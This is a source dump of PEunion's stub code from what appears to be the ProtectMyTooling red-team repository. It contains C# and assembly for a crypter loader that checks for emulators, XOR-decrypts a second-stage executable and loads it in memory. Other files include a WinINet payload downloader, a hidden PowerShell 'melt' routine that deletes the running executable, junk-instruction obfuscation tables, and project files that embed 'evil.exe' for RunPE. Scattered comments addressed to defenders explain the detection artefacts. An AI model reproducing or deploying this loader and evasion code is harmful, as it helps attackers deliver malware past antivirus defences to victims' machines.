    /// placed at the {MAIN} marker, and, when MELT is defined, starts a
    /// PowerShell process that deletes this executable.
    /// </summary>
    [STAThread]
    public static void Main(string[] __args)
    {
        // args[0] = Combined commandline arguments
        // args[1..n] = Separated commandline arguments
        // (Redundant, but easier to process)
        __CommandLine = __args[/**/0];
        __CommandLineArguments = __args.Skip(/**/1).ToArray();

        // Template marker - presumably replaced with the generated item code
        // at build time; it must stay byte-for-byte as written.
        //{MAIN}

        // Jump target; presumably used by the generated code to leave early.
        end:

#if MELT
        try
        {
            // Start powershell.exe
            // The command tries to delete this file every 100ms for a duration of up to 1 minute
            // (600 iterations, stopping once Test-Path no longer finds the file).
            // For defenders: the full command, including the path of this
            // executable, is passed on the powershell command line, so it is
            // recorded wherever process-creation command lines are logged.
            Process.Start(new ProcessStartInfo
            {
                FileName = /**/"powershell",
                Arguments = /**/"$file='" + Assembly.GetEntryAssembly().Location + /**/"';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}",
                CreateNoWindow = true,
                // ProcessWindowStyle value 1 is Hidden.
                WindowStyle = (ProcessWindowStyle)/**/1
            });
        }
        catch
        {
            // Failure to start the process is ignored.
        }
#endif
        // Also gives the `end:` label a statement to attach to when MELT is
        // not defined.
        return;
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Stub.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Resources;
6 |
public partial class __Stub
{
    /// <summary>
    /// void Main(string[] args)
    /// Entry point of the first stage: runs the emulator checks, decodes the
    /// second-stage assembly from an embedded resource and invokes its entry
    /// point in memory.
    /// </summary>
    /// <remarks>
    /// Both try blocks swallow every exception, so a failure at any step ends
    /// the program without an error being reported. The second stage is passed
    /// to Assembly.Load as a byte array; this method does not write it to disk.
    /// </remarks>
    [STAThread]
    public static void Main(string[] __args)
    {
        try
        {
            // Detect emulator
            // (an exception thrown inside the checks is ignored and execution
            // continues below)
            __DetectEmulator();
        }
        catch
        {
        }

        try
        {
            // Template marker. resourceFileName, resourceName, stage2Size, key,
            // paddingMask and paddingByteCount are not declared in this file -
            // presumably the text substituted here declares them; verify
            // against the compiler.
            //{STAGE2HEADER}

            using (ResourceReader reader = new ResourceReader(Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFileName)))
            {
                // Get stage2 executable from resources
                string type;
                byte[] resourceData;
                reader.GetResourceData(resourceName, out type, out resourceData);

                // Decrypt stage2
                // j starts at 4, skipping the first four bytes of the raw
                // resource data. Each output byte is one input byte XORed with
                // the key (truncated to a byte by the cast).
                byte[] stage2 = new byte[stage2Size];
                for (int i = /**/0, j = /**/4; i < stage2Size; i++)
                {
                    stage2[i] = (byte)(resourceData[j++] ^ key);

                    // When the low bit of the mask is set, skip over
                    // paddingByteCount input bytes.
                    if ((paddingMask & 1) == 1) j += paddingByteCount;

                    // Advance the key (shift pair by 5 and 32 - 5, then
                    // multiply by 7) and the mask (shift pair by 1 and 32 - 1).
                    // NOTE(review): these read as 32-bit rotations, which
                    // assumes key and paddingMask are 32-bit unsigned - confirm
                    // against the generated header.
                    key = (key >> 5 | key << (32 - 5)) * 7;
                    paddingMask = paddingMask >> 1 | paddingMask << (32 - 1);
                }

                // Invoke stage2 executable
                // - args[0] = Combined commandline arguments (Environment.CommandLine)
                // - args[1..n] = Separated commandline arguments
                Assembly.Load(stage2).EntryPoint.Invoke(null, new[] { new[] { Environment.CommandLine }.Concat(__args).ToArray() });
            }
        }
        catch
        {
        }
    }
}
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Api/msvcrt.inc:
--------------------------------------------------------------------------------
; Import list for the library labelled `msvcrt`. Each following pair is
; <label used in the assembly source>, '<exported function name>'.
; Note that the label `strcmpi` is bound to the export '_strcmpi'.
import msvcrt, \
    malloc, 'malloc', \
    free, 'free', \
    memset, 'memset', \
    strcmp, 'strcmp', \
    strcmpi, '_strcmpi', \
    strcpy, 'strcpy'
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Api/shlwapi.inc:
--------------------------------------------------------------------------------
; Import list for the library labelled `shlwapi`: a single pair of
; <label used in the assembly source>, '<exported function name>'.
import shlwapi, \
    PathFindFileNameA, 'PathFindFileNameA'
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Compression.asm:
--------------------------------------------------------------------------------
; Decompress - expand an LZNT1-compressed buffer into newly allocated heap memory.
;
;   Data             - pointer to the compressed input
;   Size             - size of the compressed input in bytes
;   DecompressedSize - size of the output buffer to allocate
;
; Returns in eax a pointer to the decompressed buffer, or 0 if the allocation
; or the decompression failed. The actual decompressed size reported by
; RtlDecompressBuffer is stored in a local and is not returned to the caller.
;
; `pebcall` is a macro defined outside this file; it presumably resolves the
; named export at run time instead of going through the import table - verify
; in PebApi.inc.
proc Decompress Data:DWORD, Size:DWORD, DecompressedSize:DWORD
    local Decompressed:DWORD
    local FinalDecompressedSize:DWORD

    ; Result defaults to 0 so that every early exit returns "failure"
    mov [Decompressed], 0

    ; Allocate decompressed data
    pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
    pebcall PEB_NtdllDll, PEB_RtlAllocateHeap, eax, 0, [DecompressedSize]
    test eax, eax
    jz .ret
    mov [Decompressed], eax

    ; Decompress buffer
    ; A zero return value (STATUS_SUCCESS) means success: jump straight to
    ; .ret and keep the buffer.
    lea eax, [FinalDecompressedSize]
    pebcall PEB_NtdllDll, PEB_RtlDecompressBuffer, COMPRESSION_FORMAT_LZNT1, [Decompressed], [DecompressedSize], [Data], [Size], eax
    test eax, eax
    jz .ret

    ; Free buffer, if decompression failed
    pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
    pebcall PEB_Kernel32Dll, PEB_HeapFree, eax, 0, [Decompressed]
    mov [Decompressed], 0

.ret:
    mov eax, [Decompressed]
    ret
endp
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Download.asm:
--------------------------------------------------------------------------------
; Size of one read request and of each buffer growth step (1 MiB)
DOWNLOAD_CHUNK_SIZE = 1024 * 1024

; Download - fetch a URL into a heap buffer using WinINet.
;
;   Url  - pointer to the URL string (passed to InternetOpenUrlW)
;   Size - pointer to a DWORD that receives the number of bytes read
;
; Returns in eax the pointer to the heap buffer, or 0 if no buffer is
; available. [Size] is written on every path, including the failure paths.
; The data is kept in memory; this procedure does not write it to disk.
;
; For defenders: the request goes through WinINet with
; INTERNET_OPEN_TYPE_PRECONFIG and a NULL agent string is passed to
; InternetOpenW.
proc Download Url:DWORD, Size:DWORD
    local Internet:DWORD
    local UrlHandle:DWORD
    local File:DWORD
    local BytesRead:DWORD
    local TotalBytesRead:DWORD
    local ReadSuccess:DWORD

    ; Zero everything that the shared exit path at .ret reads
    mov [Internet], 0
    mov [UrlHandle], 0
    mov [File], 0
    mov [BytesRead], 0
    mov [TotalBytesRead], 0

    ; Create internet connection
    pebcall PEB_WininetDll, PEB_InternetOpenW, NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0
    test eax, eax
    jz .ret
    mov [Internet], eax

    ; Create URL handle
    pebcall PEB_WininetDll, PEB_InternetOpenUrlW, [Internet], [Url], NULL, 0, 0, 0
    test eax, eax
    jz .ret
    mov [UrlHandle], eax

    ; Allocate buffer
    pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
    pebcall PEB_NtdllDll, PEB_RtlAllocateHeap, eax, 0, DOWNLOAD_CHUNK_SIZE
    test eax, eax
    jz .ret
    mov [File], eax

.L_download:
    ; Download chunk
    ; Destination is the buffer start plus the bytes received so far.
    mov eax, [File]
    add eax, [TotalBytesRead]
    lea ebx, [BytesRead]
    pebcall PEB_WininetDll, PEB_InternetReadFile, [UrlHandle], eax, DOWNLOAD_CHUNK_SIZE, ebx
    mov [ReadSuccess], eax

    ; Add to total size
    mov eax, [BytesRead]
    add [TotalBytesRead], eax

    ; Increase buffer size
    ; The buffer is grown to TotalBytesRead + DOWNLOAD_CHUNK_SIZE so that the
    ; next read always has a full chunk of free space. The result overwrites
    ; [File] before it is tested, so a failed reallocation leaves [File] = 0.
    pebcall PEB_Kernel32Dll, PEB_GetProcessHeap
    mov ebx, [TotalBytesRead]
    add ebx, DOWNLOAD_CHUNK_SIZE
    pebcall PEB_NtdllDll, PEB_RtlReAllocateHeap, eax, 0, [File], ebx
    mov [File], eax
    test eax, eax
    jz .ret

    ; InternetReadFile completed, if it returned TRUE and BytesRead == 0
    ; In every other case (the call returned FALSE, or bytes were read) the
    ; loop runs again.
    cmp [ReadSuccess], 0
    je .L_download
    cmp [BytesRead], 0
    jne .L_download

.ret:
    ; Close handles
    ; Reached from the early failure exits as well, in which case one or both
    ; handles are still 0.
    pebcall PEB_WininetDll, PEB_InternetCloseHandle, [UrlHandle]
    pebcall PEB_WininetDll, PEB_InternetCloseHandle, [Internet]

    ; Store allocated memory in eax
    mov eax, [File]

    ; Store size of downloaded file in [Size] out parameter
    mov edx, [TotalBytesRead]
    mov ebx, [Size]
    mov [ebx], edx

    ret
endp
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Melt.asm:
--------------------------------------------------------------------------------
; Melt - start a hidden PowerShell process that deletes the running executable.
;
; Takes no parameters and always returns 0 in eax; the result of ShellExecuteW
; is not checked.
;
; The PowerShell command is assembled on the stack as
;   $file='<path of this executable>';for(...){Remove-Item $file;Start-Sleep -m 100}
; and loops up to 600 times while the file still exists.
;
; For defenders: the child process is `powershell`, started through
; ShellExecuteW with the `open` verb and SW_HIDE, and the command line carries
; the path of the parent executable together with the Remove-Item loop, so it
; is recorded wherever process-creation command lines are logged.
;
; `pebcall` and `lodstrw` are macros defined outside this file; `lodstrw`
; presumably writes the given literal as a wide string to the address in eax -
; verify in PebApi.inc.
proc Melt
    local ExecutablePath[MAX_PATH + 1]:WORD
    local Verb[10]:WORD
    local FileName[50]:WORD
    ; NOTE(review): Arguments is declared twice with the same name and size.
    local Arguments[MAX_PATH + 1]:WORD
    local Arguments[MAX_PATH + 1]:WORD

    ; Get executable filename
    ; NULL module handle = the current process image. Nothing to do if the
    ; returned length is 0.
    lea eax, [ExecutablePath]
    pebcall PEB_Kernel32Dll, PEB_GetModuleFileNameW, NULL, eax, MAX_PATH
    cmp eax, 0
    jle .ret

    ; Verb: "open"
    lea eax, [Verb]
    lodstrw 'open'

    ; Filename: "powershell"
    lea eax, [FileName]
    lodstrw 'powershell'

    ; Load arguments part 1
    lea eax, [Arguments]
    lodstrw '$file='''

    ; Append executable filename to arguments
    lea eax, [Arguments]
    lea ebx, [ExecutablePath]
    pebcall PEB_Kernel32Dll, PEB_lstrcatW, eax, ebx

    ; Append arguments part 2
    ; lstrlenW returns the length in characters; it is scaled by 2 to get the
    ; byte offset of the current end of the wide string.
    lea eax, [Arguments]
    pebcall PEB_Kernel32Dll, PEB_lstrlenW, eax
    lea eax, [Arguments + eax * 2]
    lodstrw ''';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}'

    ; Execute
    lea eax, [Verb]
    lea ebx, [FileName]
    lea ecx, [Arguments]
    pebcall PEB_Shell32Dll, PEB_ShellExecuteW, NULL, eax, ebx, ecx, NULL, SW_HIDE

.ret:
    xor eax, eax
    ret
endp
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Obfuscator/nop.txt:
--------------------------------------------------------------------------------
1 | ; Nop-like instructions used by the obfuscator
2 |
3 | ; A semicolon separates each code block.
4 | ; $1..$8 A random general purpose register. Only registers from 'register.txt' are used.
5 | ; $rnd1..$rnd3 A 32-bit random number literal
6 |
7 | mov $1, $1
8 | ;
9 | xchg $1, $1
10 | ;
11 | xchg $1, $2
12 | xchg $2, $1
13 | ;
14 | push $1
15 | pop $1
16 | ;
17 | push $1 $2
18 | pop $2 $1
19 | ;
20 | pushfd
21 | xor $1, $rnd1
22 | xor $1, $rnd1
23 | popfd
24 | ;
25 | pushfd
26 | inc $1
27 | dec $1
28 | popfd
29 | ;
30 | pushfd
31 | push $1
32 | add esp, 4
33 | popfd
34 | ;
35 | pushfd
36 | push $rnd1
37 | add esp, 4
38 | popfd
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Obfuscator/nop_minimal.txt:
--------------------------------------------------------------------------------
1 | ; Nop-like instructions used by the obfuscator
2 |
3 | ; This is the "minimal" set that is used to obfuscate tight loops.
4 | ; Between "obfoff" and "obfon", only one obfuscation code is added between each line to avoid performance impacts.
5 |
6 | ; A semicolon separates each code block.
7 | ; $1..$8 A random general purpose register. Only registers from 'register.txt' are used.
8 | ; $rnd1..$rnd3 A 32-bit random number literal
9 |
10 | mov $1, $1
11 | ;
12 | xchg $1, $1
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Obfuscator/register.txt:
--------------------------------------------------------------------------------
1 | ; Registers that are used by the obfuscator to create random instructions
2 |
3 | eax
4 | ebx
5 | ecx
6 | edx
7 | esi
8 | edi
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Resources/default.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Resources/elevated.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/pe32/Stage2.asm:
--------------------------------------------------------------------------------
1 | format PE GUI 4.0
2 | entry Main
3 |
4 | include 'win32wx.inc'
5 | include 'nt.inc'
6 | include 'PebApi.inc'
7 |
8 | section '.text' code readable executable
9 |
; Main - entry point of the native second stage.
;
; Loads user32.dll, shell32.dll, shlwapi.dll and wininet.dll, runs the code
; placed at the {MAIN} marker, then the code placed at the {MELT} marker, and
; ends the process with exit code 0.
;
; The {MAIN} and {MELT} markers are template placeholders - presumably replaced
; with generated assembly at build time - and must stay byte-for-byte as
; written. Payload and PayloadSize are not used by the visible code; presumably
; the generated code uses them.
;
; For defenders: the four libraries are loaded by name at run time with
; LoadLibraryW rather than listed in the import table of this file.
proc Main
    local DllName[MAX_PATH + 1]:WORD
    local Payload:DWORD
    local PayloadSize:DWORD

    ; The DllName buffer is reused for each library name. The return value of
    ; each LoadLibraryW call is not checked.

    ; LoadLibrary user32.dll
    lea eax, [DllName]
    lodstrw 'user32.dll'
    pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax

    ; LoadLibrary shell32.dll
    lea eax, [DllName]
    lodstrw 'shell32.dll'
    pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax

    ; LoadLibrary shlwapi.dll
    lea eax, [DllName]
    lodstrw 'shlwapi.dll'
    pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax

    ; LoadLibrary wininet.dll
    lea eax, [DllName]
    lodstrw 'wininet.dll'
    pebcall PEB_Kernel32Dll, PEB_LoadLibraryW, eax

    ; ==========================================================================
    ; == Custom assembly ==
    ; ==========================================================================

    ;{MAIN}

    ; ==========================================================================
    ; == End of custom assembly ==
    ; ==========================================================================
.ret:

    ;{MELT}

    pebcall PEB_Kernel32Dll, PEB_ExitProcess, 0
    ret
endp
51 |
52 | include 'PebApi.asm'
53 | include 'Melt.asm'
54 | include 'Compression.asm'
55 | include 'Download.asm'
56 | include 'RunPE.asm'
57 | include 'Drop.asm'
58 |
59 | include 'EmbeddedStrings.inc'
60 | include 'EmbeddedSources.inc'
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.FileFormats.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.FileFormats.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.FileIcons.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.FileIcons.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.UI.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.UI.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/BytecodeApi.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/BytecodeApi.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/HtmlRenderer.WPF.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/HtmlRenderer.WPF.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/HtmlRenderer.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/HtmlRenderer.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/MarkdownSharp.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/MarkdownSharp.dll
--------------------------------------------------------------------------------
/contrib/PEunion/lib/PEunion.Compiler.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/lib/PEunion.Compiler.dll
--------------------------------------------------------------------------------
/contrib/PEunion/peubuild.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/peubuild.exe
--------------------------------------------------------------------------------
/contrib/PEunion/peubuild.exe.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/ScareCrow/ScareCrow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/ScareCrow
--------------------------------------------------------------------------------
/contrib/ScareCrow/ScareCrow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/ScareCrow.exe
--------------------------------------------------------------------------------
/contrib/ScareCrow/libcrypto-3-x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/libcrypto-3-x64.dll
--------------------------------------------------------------------------------
/contrib/ScareCrow/libcurl.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/libcurl.dll
--------------------------------------------------------------------------------
/contrib/ScareCrow/libssl-3-x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/libssl-3-x64.dll
--------------------------------------------------------------------------------
/contrib/ScareCrow/osslsigncode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/osslsigncode
--------------------------------------------------------------------------------
/contrib/ScareCrow/osslsigncode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ScareCrow/osslsigncode.exe
--------------------------------------------------------------------------------
/contrib/_project-files/CallObf/configExample.ini:
--------------------------------------------------------------------------------
1 | ; Template for the config file:
2 | ; * Sections can be written as:
3 | ; [dll_name]
4 | ; old_sym=new_sym
5 | ; * The dll name is case insensitive, but
6 | ; the old and the new symbols are not.
7 | ; * You can use the wildcard on both the
8 | ; dll name and the old symbol.
9 | ; * You can use '#' at the start of
10 | ; the old or the new symbol to flag
11 | ; an ordinal.
12 | ; * The new symbol should be exported
13 | ; by the dll so the windows loader can resolve it.
14 | ; For example:
15 | ; * Obfuscating all of the symbols
16 | ; imported from user32.dll with ordinal 1600.
17 | [user32.dll]
18 | *=#1600
19 | ; * Obfuscating symbols imported from both
20 | ; kernel32.dll and kernelbase.dll with Sleep.
21 | [kernel*.dll]
22 | *=Sleep
23 | ; * Obfuscating fprintf with exit.
24 | [*]
25 | fprintf=exit
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/beds-maximum.crproj:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/maximum.crproj:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/mkaring-maximum.crproj:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/_project-files/ConfuserEx/neo-maximum.crproj:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/_project-files/PEunion/dotnet64.peu:
--------------------------------------------------------------------------------
1 | [stub]
2 | type = net64
3 | padding = 50
4 |
5 | [manifest]
6 | template = default
7 |
8 | [source.embedded]
9 | id = 4317a448-3376-4830-92df-8b6a3ff0b02d
10 | path = evil.exe
11 | compress = true
12 |
13 | [action.invoke]
14 | source = 4317a448-3376-4830-92df-8b6a3ff0b02d
15 |
--------------------------------------------------------------------------------
/contrib/_project-files/PEunion/dotnet86.peu:
--------------------------------------------------------------------------------
1 | [stub]
2 | type = net32
3 | padding = 50
4 |
5 | [manifest]
6 | template = default
7 |
8 | [source.embedded]
9 | id = 4317a448-3376-4830-92df-8b6a3ff0b02d
10 | path = evil.exe
11 | compress = true
12 |
13 | [action.invoke]
14 | source = 4317a448-3376-4830-92df-8b6a3ff0b02d
15 |
--------------------------------------------------------------------------------
/contrib/_project-files/PEunion/native86.peu:
--------------------------------------------------------------------------------
1 | [stub]
2 | type = pe32
3 | padding = 50
4 |
5 | [manifest]
6 | template = default
7 |
8 | [source.embedded]
9 | id = 97b6fbca-50d8-4efc-92d8-44da11071184
10 | path = evil.exe
11 | compress = true
12 |
13 | [action.runpe]
14 | source = 97b6fbca-50d8-4efc-92d8-44da11071184
15 |
--------------------------------------------------------------------------------
/contrib/_project-files/netreactor-projects/net-reactor-full1.nrproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/_project-files/netreactor-projects/net-reactor-full1.nrproj
--------------------------------------------------------------------------------
/contrib/_project-files/themida-projects/advanced-tiger-red.tmd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/_project-files/themida-projects/advanced-tiger-red.tmd
--------------------------------------------------------------------------------
/contrib/_project-files/vmprotect-projects/full-vmprotect.vmp:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/_project-files/vmprotect/full-vmprotect.vmp:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/amber/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/contrib/amber/amber.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/amber/amber.exe
--------------------------------------------------------------------------------
/contrib/amber/keystone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/amber/keystone.dll
--------------------------------------------------------------------------------
/contrib/denim/denim.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/denim/denim.exe
--------------------------------------------------------------------------------
/contrib/donut/donut.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/donut/donut.exe
--------------------------------------------------------------------------------
/contrib/exiftool.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/exiftool.exe
--------------------------------------------------------------------------------
/contrib/packer64/Packer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/packer64/Packer.exe
--------------------------------------------------------------------------------
/contrib/packer64/PackerStub.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/packer64/PackerStub.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/injector32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/injector32.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/injector64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/injector64.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/pe2shc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/pe2shc.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/runshc32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/runshc32.exe
--------------------------------------------------------------------------------
/contrib/pe2shc/runshc64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe2shc/runshc64.exe
--------------------------------------------------------------------------------
/contrib/peCloakCapstone/README.md:
--------------------------------------------------------------------------------
1 | peCloak - Capstone
2 | ==================
3 |
4 | This is a simple fork of [SecuritySift's peCloak](http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) that uses [Capstone](http://www.capstone-engine.org). The intention is to provide a fork based on a well-maintained, up-to-date disassembly library and to make the script multi-platform.
5 |
6 | Here's what I did so far:
7 | * Replaced pydasm with Capstone
8 | * Included a patched version of [SectionDoubleP](http://git.n0p.cc/?p=SectionDoubleP.git;a=summary) as it also relied on pydasm
9 | * Made data (un)packing platform independent by always using standard sizes
10 |
11 | This way I managed to create obfuscated 32-bit Windows executables on 64-bit Linux which is nice :)
12 |
13 | Still, this is just a quick hack, bugs most probably hide here and there and I probably left some dead code too.
14 |
--------------------------------------------------------------------------------
/contrib/peCloakCapstone/SectionDoubleP.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/peCloakCapstone/SectionDoubleP.pyc
--------------------------------------------------------------------------------
/contrib/pe_tools/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining a copy
4 | of this software and associated documentation files (the "Software"), to deal
5 | in the Software without restriction, including without limitation the rights
6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
7 | copies of the Software, and to permit persons to whom the Software is
8 | furnished to do so, subject to the following conditions:
9 |
10 | The above copyright notice and this permission notice shall be included in all
11 | copies or substantial portions of the Software.
12 |
13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
